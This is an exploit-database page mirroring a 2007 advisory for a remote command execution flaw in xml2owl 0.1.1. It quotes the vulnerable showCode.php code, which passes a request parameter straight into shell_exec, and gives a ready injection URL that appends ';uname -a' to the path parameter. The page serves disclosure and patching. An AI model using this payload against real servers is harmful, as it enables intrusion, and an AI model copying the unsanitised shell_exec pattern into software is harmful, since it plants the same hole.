header-logo
Suggest Exploit
vendor:
xml2owl
by:
MhZ91
5.5
CVSS
MEDIUM
Remote Command Execution
78
CWE
Product Name: xml2owl
Affected Version From: 2000.1.1
Affected Version To: 2000.1.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

xml2owl-0.1.1 – Remote Command Execution

In the file showCode.php, there is a vulnerability that allows for remote command execution by modifying the $path variable and using the shell_exec function.

Mitigation:

Update to a patched version of xml2owl or sanitize user input to prevent command injection.
Source

Exploit-DB raw data:

---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
 |___|___|  /\__|  /______  /\___  >__|            |___||__| 
          \/\______|      \/     \/                          
---------------------------------------------------------------

Http://www.inj3ct-it.org        Staff[at]inj3ct-it[dot]org   

---------------------------------------------------------------

          Remote Command Execution

---------------------------------------------------------------

# Author: MhZ91
# Title: xml2owl-0.1.1 - Remote Command Execution
# Download: http://surfnet.dl.sourceforge.net/sourceforge/xml2owl/xml2owl-0.1.1.tar.bz2
# Bug: Remote Command Execution
# Info: Up to now, most ontologies are created manually, which is very time-expensive. The goal is it, to produce ontologies automatically via XSLT, which fit as good as possible to a given XML-file resp. XML-Schema-file
# Visit: http://www.inj3ct-it.org

---------------------------------------------------------------

In the file showCode.php there is this... 

<?
	$xml2html = "xsl/xmlverbatim.xsl";
	$path = $_REQUEST['path']; <- 
	
  if(class_exists('XSLTProcessor')) {
    $xsl = new XSLTProcessor();
    
    $res = DOMDocument::load($path);
  
    $xsl->importStylesheet(DOMDocument::load($xml2html));
    echo $xsl->transformToXML($res);
  }
  else {
    $exec_string = "xsltproc " . $xml2html . " " . $path; <-
    echo shell_exec($exec_string); <-
  }
?>

We can modify the $path variable.. and give a remote command execution by the function shell_exec.. 

Type http://www.site.com/showCode.php?path=;uname -a

... 

---------------------------------------------------------------

# milw0rm.com [2007-12-28]

Navigation

Suggest Exploit

Services By CQR